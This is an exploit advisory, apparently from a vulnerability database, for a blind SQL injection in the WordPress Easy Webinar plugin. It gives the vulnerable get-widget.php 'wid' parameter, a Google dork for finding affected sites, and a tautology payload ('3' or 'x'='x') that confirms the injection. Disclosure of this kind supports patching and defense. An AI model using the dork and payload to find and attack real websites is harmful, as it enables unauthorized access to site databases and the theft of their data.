WordPress Easy Webinar Blind SQL Injection

2012.10.27
Credit: Robert Cooper
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: allinurl: get-widget.php?wid=

# Exploit Title: Wordpress Easy Webinar Plugin Blind SQL Injection Vulnerability # Vendor Homepage: www.easywebinarplugin.com # Date: 10/26/2012 # Author: Robert Cooper (robert.cooper [at] areyousecure.net) # Tested on: [Linux/Windows 7] #Vulnerable Parameters: wid= # Google Dork: allinurl: get-widget.php?wid= ############################################################## Exploit: www.example.com/wp-content/plugins/webinar_plugin/get-widget.php?wid=[SQLi] Note: The HTTP response will read 404, but this is false: www.example.com/wp-content/plugins/webinar_plugin/get-widget.php?wid=3' or 'x'='x This will result in the page loading correctly and show that the plugin is vulnerable to injection (string). ############################################################## www.areyousecure.net # Shouts to the Belegit crew

References:

http://www.easywebinarplugin.com/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top